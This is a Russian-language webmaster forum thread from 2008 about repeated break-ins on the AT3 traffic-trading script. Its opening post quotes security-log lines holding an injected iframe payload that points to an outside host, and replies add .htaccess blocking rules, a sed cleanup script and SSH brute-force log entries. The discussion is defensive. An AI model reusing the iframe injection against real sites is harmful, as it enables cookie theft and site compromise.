Реклама на сайте Advertise with us

Закрывайте админки ат3, опять..

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 24/07/08 в 03:44       Ответить с цитатойцитата 

свежачек напихали опять, в файл секьюрити:
Код:
<tr class=row2><td style="white-space: nowrap;">18:22 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range)  tried to login with
'src=http://92.62.101.9/i.php> / </iframe>.</td></tr>
<tr class=row2><td style="white-space: nowrap;">18:22 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range)  tried to login with
<iframe width=1 height=1 a=" / " b='.</td></tr>
<tr class=row2><td style="white-space: nowrap;">18:43 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range)  tried to login with
'src=http://92.62.101.9/i.php> / </iframe>.</td></tr>
<tr class=row2><td style="white-space: nowrap;">18:43 - 23 Jul</td><td style="white-space: nowrap;">system</td><td style="white-space: nowrap;">200.63.46.23 (out of range)  tried to login with
<iframe width=1 height=1 a=" / " b='.</td></tr>


билд последний стоит у меня

0
 

♣ MAFIA ♣

С нами с 03.07.07
Сообщения: 1657
Рейтинг: 2246


Передовик Master-X (16.12.2009) Передовик Master-X (01.01.2010)
Ссылка на сообщениеДобавлено: 24/07/08 в 05:29       Ответить с цитатойцитата 

200.63.46.23 вот этот айпи баним

в последнем билде есть возможность ограничить доступ в админку по айпи

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 24/07/08 в 07:38       Ответить с цитатойцитата 

советую такой хтаксес:

Код:

RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC,OR]
- RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC]
+ RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
+ RewriteCond %{QUERY_STRING} ^(.*)?iframe(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]


"- " и "+ " - убрать, я просто показал что изменилось с последнего редактирования хтаксеса, который я постил в остальных темах форума по этому поводу.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

4
 

www.phpdevs.com

С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105


Передовик Master-X (01.09.2005) Передовик Master-X (16.09.2005) Передовик Master-X (01.10.2005) Передовик Master-X (16.08.2006) Передовик Master-X (16.10.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 24/07/08 в 10:42       Ответить с цитатойцитата 

ат3 в последнее время вообще не вызывает доверия в плане безопасности. Насколько знаю, многие из "ру-говорящего" адалта его уже меняют или поменяли на другие другие варианты.

Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.

0
 

(.)(.) Сиськеее...

С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651

Ссылка на сообщениеДобавлено: 24/07/08 в 11:15       Ответить с цитатойцитата 


Так вот и хрен-то... Не понимаю, люди продолжают сидеть на этом дырявом и потенциально опасном для сижев скрипте... Ну да, Soft-Com монстр своего дела и помогает закрывать чужие дыры хтакцессами..., но с ат3 только и приходится что заниматься проверкой на "а не подломали ли снова"... Вот как будто делать больше нечего, как проверять постоянно на предмет нового говна на морде сижев...
И я, и не только я, говорили что и новый билд этого ат3 все-равно ломанут, т.к. способы устранения багов у производителя этого скрипта просто смешны! Выйдет новый билд, снова его юзерам придется обновляться, таращиться в админки и смотреть как работает новый билд...

Тут можно только пожелать удачи юзерам ат3..., терпения желать не надо, т.к. и так у них его выше крыши...icon_smile.gif

0
 

Прожигатель жизни

С нами с 20.10.05
Сообщения: 942
Рейтинг: 638

Ссылка на сообщениеДобавлено: 24/07/08 в 12:31       Ответить с цитатойцитата 

Как я понял смысл бага тотже: куки отсылаются когда админ заходит в security log?

Это уже последняя капля! +100 к Project

0
 



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 24/07/08 в 16:01       Ответить с цитатойцитата 

не, на морде ничего не появилось, это только попытка взлома.
к тому же пароль теперь шифрованый в ат3, но лучше все-таки его сменить.
кстати в атх подобного нет, непонятно почему.

ат3 менять не буду icon_smile.gif, может я и мазохист но, перепробовал все скрипты - ничего не вставило icon_smile.gif

0
 



С нами с 10.10.05
Сообщения: 785
Рейтинг: 783

Ссылка на сообщениеДобавлено: 24/07/08 в 18:23       Ответить с цитатойцитата 

Цитата:
ат3 менять не буду icon_smile.gif, может я и мазохист но, перепробовал все скрипты - ничего не вставило icon_smile.gif


гонять ботов это не мазохизм это самоуспокоение

0
 



С нами с 05.01.03
Сообщения: 1909
Рейтинг: 1663

Ссылка на сообщениеДобавлено: 24/07/08 в 18:41       Ответить с цитатойцитата 

так ТС ты не написал - было у тебя ограничение по айпи или не было. т.е. его научились обходить?

0
 



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 24/07/08 в 19:17       Ответить с цитатойцитата 

usanatol писал:
гонять ботов это не мазохизм это самоуспокоение

ты вот обоснуй свои слова.
в других скриптах я ничего нового не увидел из античита.
ат3 предоставляет достаточно статистики, которой хватает для анализа, плюс свои методы, о которых я писать не буду.

ну и основной показатель - сайны.

0
 



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 24/07/08 в 19:19       Ответить с цитатойцитата 

Uncle Joe писал:
так ТС ты не написал - было у тебя ограничение по айпи или не было. т.е. его научились обходить?

ограничение по айпи было выключено

0
 



С нами с 04.09.03
Сообщения: 439
Рейтинг: 410

Ссылка на сообщениеДобавлено: 24/07/08 в 21:11       Ответить с цитатойцитата 

Benny писал:

в других скриптах я ничего нового не увидел из античита.


какие ты другие скрипты пробовал помимо атл ?

0
 



С нами с 10.10.05
Сообщения: 785
Рейтинг: 783

Ссылка на сообщениеДобавлено: 24/07/08 в 23:03       Ответить с цитатойцитата 

Цитата:
ты вот обоснуй свои слова.
в других скриптах я ничего нового не увидел из античита.
ат3 предоставляет достаточно статистики, которой хватает для анализа, плюс свои методы, о которых я писать не буду.

ну и основной показатель - сайны.


не знаю какие там методы но at3 и протон моих трейдеров в упор не видят ботов которых ATS показывает запросто и о чем может быть речь когда AT3 не показывает загрузку графики которую больше 80 ботов не грузят хотя и обрабатывают кодированный яваскрипт на котором и основанно большинство античит систем таких скриптов как AT3

0
 



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 24/07/08 в 23:37       Ответить с цитатойцитата 

а кто сказал, что ат3 показывает мне где бот а где нет, опять между строк читаешь?
ат3 - менеджер трафика, его задача раздавать траф, а не ловить ботов.

0
 



С нами с 10.10.05
Сообщения: 785
Рейтинг: 783

Ссылка на сообщениеДобавлено: 25/07/08 в 01:40       Ответить с цитатойцитата 

Цитата:
а кто сказал, что ат3 показывает мне где бот а где нет, опять между строк читаешь?
ат3 - менеджер трафика, его задача раздавать траф, а не ловить ботов.

Ну вот он его и раздает в обмен на ботов. А траф сейчас раздавать умеют практически все кстати на мой взгляд если выкинуть вопрос античита TTT будет получше AT3 и базы там не сыпятся

0
 

Хостинг, CDN

С нами с 23.12.04
Сообщения: 1259
Рейтинг: 1405

Ссылка на сообщениеДобавлено: 25/07/08 в 15:08       Ответить с цитатойцитата 

Stek писал:
ат3 в последнее время вообще не вызывает доверия в плане безопасности. Насколько знаю, многие из "ру-говорящего" адалта его уже меняют или поменяли на другие другие варианты.


Всего лишь надо правильно и грамотно закрыть то, что по определению не должно быть доступно для других.. И проблем не будет абсолютно никаких..

PS. Раз ломают, значит скрипт популярен.. Захотят сломать другие, сломают, был бы прок :-)

0
 

(.)(.) Сиськеее...

С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651

Ссылка на сообщениеДобавлено: 25/07/08 в 15:18       Ответить с цитатойцитата 

DiamonD75 писал:
Всего лишь надо правильно и грамотно закрыть то, что по определению не должно быть доступно для других.. И проблем не будет абсолютно никаких..

PS. Раз ломают, значит скрипт популярен.. Захотят сломать другие, сломают, был бы прок :-)

Ну не все так однозначно...
Просто в ат3 ну вообще по идиотски организованы логи и прочие вещи... Ну на кой хер делать так, что с помощью форм для логина можно втолкнуть в логи ифрейм?! Это вообще уже верх идиотизма! Даже я, не будучи проф. программером не сделал бы такой ерунды... Мало того, с помощью некоторых функций процесса добавления нового трейда можно было записать любой файл в любую директорию... Это-ж ипануцца... Неужели было сложно сделать проверку на допустимые параметры записи? Это же элементарно!
Так а рассматривая их апдэйты просто слезы на глазах наворачиваются... Они не исправляют дыры..., они их просто прикрывают тазом...

И я сильно сомневаюсь, что другие скрипты будет так легко сломать, как ат3... Возможно, но с куда бОльшими затратами времени и сил...

0
 



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 25/07/08 в 18:58       Ответить с цитатойцитата 

usanatol писал:
Ну вот он его и раздает в обмен на ботов.

мы с тобой что, трейдим? откуда тебе знать что раздает мой скрипт ат3?
еще раз повторяю, за античит у меня отвечает другой скрипт.
да и топик не об этом..

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 26/07/08 в 09:04       Ответить с цитатойцитата 

Project писал:
Ну не все так однозначно...
Просто в ат3 ну вообще по идиотски организованы логи и прочие вещи... Ну на кой хер делать так, что с помощью форм для логина можно втолкнуть в логи ифрейм?! Это вообще уже верх идиотизма! Даже я, не будучи проф. программером не сделал бы такой ерунды... Мало того, с помощью некоторых функций процесса добавления нового трейда можно было записать любой файл в любую директорию... Это-ж ипануцца... Неужели было сложно сделать проверку на допустимые параметры записи? Это же элементарно!
Так а рассматривая их апдэйты просто слезы на глазах наворачиваются... Они не исправляют дыры..., они их просто прикрывают тазом...

И я сильно сомневаюсь, что другие скрипты будет так легко сломать, как ат3... Возможно, но с куда бОльшими затратами времени и сил...


Это впихивается не только через логин, но и через in.cgi
Просто ебанутая система обработки запроса ...

-- Оффтоп --
Меня поражает когда все обсирают пхп - типа говноязык ... но на самом деле у говнопрограмистов говноруки ростут из говножопы ...
Доказано кодерами АТ3/АТХ (пишут на Сicon_smile.gificon_smile.gif)

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 01.11.06
Сообщения: 316
Рейтинг: 293

Ссылка на сообщениеДобавлено: 27/07/08 в 15:05       Ответить с цитатойцитата 

Soft-Com писал:
Это впихивается не только через логин, но и через in.cgi
Просто ебанутая система обработки запроса ...

-- Оффтоп --
Меня поражает когда все обсирают пхп - типа говноязык ... но на самом деле у говнопрограмистов говноруки ростут из говножопы ...
Доказано кодерами АТ3/АТХ (пишут на Сicon_smile.gificon_smile.gif)


на С пишут скорее для того чтоб код закрыть
а вобще я полгода как перевел все сиджи на атс и нисколько не жалею..
ат3 будут ломать и дальше там ниче несделаеш, та и кто пишетего непонятно
ктото видел чтоб тот прогер хоть раз огдето тписался ?

0
 



С нами с 24.06.08
Сообщения: 53
Рейтинг: -6

Ссылка на сообщениеДобавлено: 31/07/08 в 01:54       Ответить с цитатойцитата 

Блин, никак от этого де..ма не получается отделаться. Позаливал хтаксесы в корень и cgi-bin, прописал в админке доступ только с моего ипа и всеравно, лезет и лезет, что не почищу - снова появляется, пробовал через шелл найти и вычистить все как тут на форуме писали,
сделал файлик sed.sh с кодом

#!/bin/sh
# for fname in `cat report.txt`; do
cat $fname | sed 's/ .*<script> var s.*<\/script> .*//g' > $fname.temp

if [ ! "`cat $fname.temp | md5sum`" = "`cat $fname | md5sum`" ]; then
cat $fname.temp > $fname
fi
rm $fname.temp
done

запускаю и ноль реакции, нету файла report.txt

наверняка чтото не так делаю - не получается. Помогите народ советом, у меня виртуал на Цент ОС. Ато не знаю уж что делать, хоть бери и сноси нах сервер и все снанова ставь.

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 31/07/08 в 06:39       Ответить с цитатойцитата 

1. раскоментируй строку
# for fname in `cat report.txt`; do

2. Файл report.txt должен быть у тебя сгенерирован ЕЩЕ до начала запуска скрипта sed.sh - его судя по фсему нужно генерить командой грепайющей файлы на содержание строки ".*<script> var s.*<\/script> .*" - но этом на самом деле неправильно (много сиджеводов делают блоки на яваскрипте на морде сиджа для различных целей, и конструкция var s может быть целиком легитимной)

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 24.06.08
Сообщения: 53
Рейтинг: -6

Ссылка на сообщениеДобавлено: 31/07/08 в 19:08       Ответить с цитатойцитата 

нифига чтото не выходит, я только что скачал файлы лога сервера, там через каждых 5 секунд вот такая шняга

host sshd(pam_unix)[20266]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=210.66.151.176 user=root

или такая

host sshd(pam_unix)[32594]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ftp.cge.ru

падло ламануть хочет, в жизни повстречал бы - убил бы

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 31/07/08 в 19:39       Ответить с цитатойцитата 

это к взлому АТ не имеет никакого отношения

у тебя ssh открыт наружу для всех айпишников.

если это так и нужно, то поставь себе denyhosts - он полечит от таких брутфорс атак.

если нет - то прикрой порт фаерволлом, или сделай по умолчанию deny правило в /etc/hosts.deny для всех кроме себя

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 24.06.08
Сообщения: 53
Рейтинг: -6

Ссылка на сообщениеДобавлено: 31/07/08 в 20:50       Ответить с цитатойцитата 

Спасибо Soft-Com, я в этом не оч силен, но посоветуюсь с сапортом и чтото решим, а АТЛ буду сносить нах, такого гемора на свою голову мне больше не надо, сомневаюсь что их новые билды если такие и будут чтото решат кардинально.

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »